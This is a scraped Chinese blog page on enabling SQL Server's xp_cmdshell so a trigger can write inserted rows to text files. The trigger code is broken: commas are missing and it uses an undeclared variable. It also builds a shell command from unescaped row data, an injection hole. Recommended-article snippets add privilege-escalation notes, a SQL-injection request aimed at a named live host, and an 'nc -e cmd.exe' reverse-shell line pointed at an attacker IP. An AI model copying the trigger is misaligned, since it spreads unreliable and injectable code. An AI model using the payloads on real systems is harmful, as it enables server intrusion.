MSSql中启用xp_cmdshell调用第三方程序以及遇到中文路径时报错的解决方案

最新推荐文章于 2023-07-06 15:45:54 发布
最新推荐文章于 2023-07-06 15:45:54 发布
阅读量1.9k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qbook/article/details/8612516
本文介绍如何在SQL Server中使用触发器配合xp_cmdshell功能,在数据表插入新记录时自动生成TXT文件,详细步骤包括启用及禁用xp_cmdshell、编写触发器等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

需求环境:数据表增加一条数据时在对应的目录下生成一个文本文件记录数据库的记录提供给第三方程序使用。

使用xp_cmdshell 默认情况下没有被打开

1.打开启用xp_cmdshell

--开启xp_cmdshell部分
--------------------------------------------------
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options'1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell'1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO


--通过xp_cmdshell执行shell命令的部分
--------------------------------------------------
Exec xp_cmdshell 'bcp '
GO


--关闭xp_cmdshell部分
-----------------------------------------------------
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options'1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell'0
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO

2.使用xp_cmdshell  生成txt 文件

-- =============================================
-- Author:  <Author,,Name>
-- Create date: <Create Date,,>
-- Description: <Description,,>
-- =============================================
ALTER TRIGGER [dbo].[table_trg]
   ON  [dbo].[table]
   AFTER INSERT
AS
DECLARE @content nvarchar(1024),@id nvarchar(1024)
DECLARE @lReturn int
DECLARE @cmd nvarchar(1024),@var nvarchar(1024)
BEGIN
 -- SET NOCOUNT ON added to prevent extra result sets from
 -- interfering with SELECT statements.
 SET NOCOUNT ON;

     select top 1 @content= name,@id= id from [table] order by id desc
    -- Insert statements for trigger here
 SET @var = @content
 SET @cmd = N'echo ' + N'"' + @var + N'"' +  N'>d:/workspace/' + @nid + '.txt'
 EXEC tpm..xp_cmdshell @cmd

END

 

SQL Server数据库xp_cmdshell提权笔记
千寻的博客
06-04 3532
SQL Server数据库xp_cmdshell提权
渗透测试中的MSSQL横向活动研究
weixin_54787877的博客
03-10 425
写在前面的话 使用发现的凭证在环境中进行横向移动/渗透是渗透测试团队的共同目标。在间受限的操作中,快速可靠地使用新获得的一组凭据的这种能力是必不可少的。在这篇文章中,我们将介绍如何通过MSSQL CLR自动进行横向移动/渗透,整个过程中不会接触磁盘,也不需要XP_CMDSHELL。除此之外,我们还会介绍如何防御并检测这种类型的渗透攻击。 不过,SQL Server进程仍会将DLL临写入磁盘。 利用MSSQL服务的后渗透利用需要通过存储在进程中的XP_CMDSHELL来执行命令,并在MSSQL进程的上下.
通过SQLServerxp_cmdshell在服务器之间传送文件
飘雪
07-27 2350
xp_cmdshell作为SQL Server的扩展存储过程之一,也是SQL Server在安全大敌,很多SQL安全手册上都要求关闭此过程,这不利用其特性简要实现了一个在SQL服务器之间传取文件的功能,在SQL2005下测试通过,现贴出代码下,大家共赏之 /* * 脚本:通过SQLServerxp_cmdshell在服务器之间传送文件 通过SQL SQLServer实现,要求支持远程访
MSSQL_打开xp_cmdshell
weixin_34061482的博客
10-09 146
1... -------------------------------------------------------------------------- EXEC master..xp_cmdshell 'BCP viewfocus..v1 in F:\sql\v1.txt -c -T' 报错..... 2.打开------------------------ ----------...
SQL 使用..xp_cmdshell 执行相应程序
chengmodelong的专栏
03-21 5339
在SQL SERVER 中可以新建作业。执行指定应用程序。达到定执行某些任务的目的。 新建作业的方法自己搜索。直接 说关键步骤。 一、先把要执行代码写成bat 批处理文件(或都 自己的exe 程序) @echo off start iexplore.exe www.baidu.com ping -n 10 127.0.0.1>> d:\a.txt taskkill /f /im iexp
使用sp_configure启用 'xp_cmdshell'h扩展存储过程
weixin_33736649的博客
08-07 1080
存储过程分自定义存储、系统存储、扩展存储三种存储中扩展存储过程陌生点,什么是扩展存储过程呢?扩展存储过程提供SQL Server 到外部程序的接口,以便进行各种维护活动。也就是在SQLServer中执行SQL系统之外的命令功能。例如我要在SQL中执行操作系统的xcopy命令,把本地备份的数据库拷贝到远程共享服务器上,如下命令:EXEC XP_CMDSHELL 'XCOPY ...
关于xp_cmdshell的注意事项
kongzifan的专栏
01-15 718
一、MSSQL2000的master本身没有扩展存储过程xp_cmdshell,所以要创建一下,然后就看直接使用了:sqlCommand.CommandText ="use master;"+                                            "if not exists (select * from dbo.sysobjects where id = ob
SQL Server中存储过程比直接运行SQL语句慢的原因
weixin_30654419的博客
05-06 195
在很多的资料中都描述说SQLSERVER的存储过程较普通的SQL语句有以下优点: 1. 存储过程只在创造进行编译即可,以后每次执行存储过程都不需再重新编译,而我们通常使用的SQL语句每执行一次就编译一次,所以使用存储过程可提高数据库执行速度。 2. 经常会遇到复杂的业务逻辑和对数据库的操作,这个候就会用SP来封装数据库操作。当对数据库进行复杂操作(如对多个表进...
在Sql Server中调用外部EXE执行程序引发的问题
09-10
一旦xp_cmdshell启用,便可以开始尝试调用外部程序了。然而,这并不意味着所有的外部程序都可以无阻碍地执行。在调用外部程序,需要注意以下几个关键问题。 1. 权限问题:调用外部程序,需要具备足够的权限。...
POST /psy/NPreenManage/NPreenSMSList.asmx HTTP/1.1 Host: xlcp.scuvc.com Content-Type: text/xml; charset=utf-8 Content-Length: 461 SOAPAction: "RuiGe.WebUi.NPreenSMS/Seach" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <Seach xmlns="RuiGe.WebUi.NPreenSMS"> <sqlwhere>;DECLARE @mvtp VARCHAR(8000);SET @mvtp=0x6563686f2031;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @mvtp--</sqlwhere> </Seach> </soap:Body> </soap:Envelope>这是sql注入请求体,但是响应报错报错信息为:System.Data.SqlClient.SqlException: 在执行 xp_cmdshell 的过程中出错。调用 'CreateProcess' 失败,错误代码: '5',如何解决
最新发布
07-24
但是,在尝试使用xp_cmdshell执行命令,遇到了错误代码5(拒绝访问)。这通常是因为SQL Server服务账户没有足够的权限执行该操作。此外,目标Web服务器是Nginx,所以我们需要将WebShell写入到Nginx的Web目录中。 ...
mssql拿shell
03-22
`xp_cmdshell` 是 Microsoft SQL Server 中的一个扩展存储过程,允许直接调用操作系统命令并返回其输出。此功能在早期版本(如 MSSQL 2000)中默认启用,但在 MSSQL 2005 及更高版本中,默认情况下被禁用[^2]。 ...
xp_cmdshell 命令开启 NET USE 命令 建立共享文件
weixin_30410119的博客
12-09 920
最近做了几个小项目用到了一些 Window 网络命令 ,今天总结一下一.SQLServer2008 开启xp_cmdshell 权限(截图对应开启经常遇到该权限不存在的问题) 1. 2. 3. 4. EXEC sp_configure 'show advanced options', 1 GO RECONFIGUR...
SQL Server 2012 xp_cmdshell不能执行的解决办法
学习是一种习惯
07-10 8171
        一个很早的系统,数据库一直跑的好好的,但在最近就无法执行压缩备份文件了,以至于1TB的硬盘很快就撑爆了。查了很久也没有找到原因,按照网上的很多方法都试了一遍,结果都不行。        这里要说一下啊,2008版本以后的sql server与之前版本的有很大的不同,就“外围应用“来讲,低版本中都是在操作系统的应用里可以看到的单独的应用,到了高版本后它变成了数据库实例的右键菜单里的一...
XP_cmdshell
热门推荐
飞轩亭
08-14 2万+
一、简介        xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。 三、SQL Server 2005中的xp_cmdshell         由于存在安全隐患,所以在SQL Server 2005中, xp_cmdshell 默认是关闭的。        此,如果执行 xp_cmdshell 将会提示服务未开启:    
数据库提权,Mssql xp_cmdshell提权
luSaMa的博客
07-06 2798
针对Mssql xp_cmdshell提权的学习实践,SQL Server2008/2012及以前版本基本都能用,但是2016或更高版本部分不能用,或者SA权限太低,导致无法提权。数据库提权的方式也不止有Mssql xp_cmdshell一种,之后更多的提权方式也是我更应该学习的地方。
关于xp_cmdshell存储过程的网络访问权限及sp_procoption的用法
ReViSion的专栏
02-07 2102
问题如下:我想使用这个存储过程来访问局域网内其他机器的东西,比如复制。举个例子:  我在sqlserver服务器上做了网络映射,盘符为x,网络路径://192.168.1.5/d$/test,我在查询分析器里面输入:xp_cmdshell  dir  x:,系统返回两种情况:1,拒绝访问;2,系统找不到指定的路径  我还是没搞明白怎么会有这两个返回,在dos下操作很正常,都可以。sqlserv
SQLSERVER扩展存储过程XP_CMDSHELL的简单应用
zgqtxwd的专栏
04-30 257
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
【慎点】记录一次SQL引起的内网渗透
Button12138的博客
01-10 637
近期一直再学习内网渗透,实验什么的都是玩玩靶机。
mssql提权之反弹shell
01-14
### 在 MSSQL 中通过提权技术实现反弹 Shell #### 利用 `xp_cmdshell` 执行命令并反弹 Shell 对于拥有高权限账户(如 sa 用户),可以通过启用 `xp_cmdshell` 来执行操作系统级别的指令,进而建立反向连接。由于 `xp_cmdshell` 默认仅在 SQL Server 2000 版本中处于激活状态,在后续版本里已被禁用;不过这并不妨碍攻击者借助 sp_configure 命令再次打开此功能[^3]。 一旦成功启用了 `xp_cmdshell`,便能够调用 Netcat 或其他类似的工具来创建一个从目标机器指向攻击者的交互式会话: ```sql EXEC master..xp_cmdshell 'nc -e cmd.exe 攻击机IP 端口' ``` 上述语句中的 IP 地址应替换为实际用于接收回连请求的服务器地址,而端口号则是事先设定好的监听端口[^1]。 需要注意的是,现代 Windows 防火墙策略以及应用程序白名单机制可能会阻止此类操作的有效实施。因此,在真实环境中应用这些技巧之前,务必考虑环境的安全配置情况。 另外一种方式是利用 `OPENROWSET` 函数配合 `OPENDATASOURCE` 进行跨数据库查询的同注入恶意代码,从而间接达到相同的效果。然而这种方法较为复杂且依赖于特定条件下的网络设置与认证模式[^5]。 为了提高成功率,建议先尝试获取更高层次的操作系统访问权限,比如通过 Web 应用程序漏洞获得初始立足点后再进一步探索内部资源和服务,最终达成远程控制的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值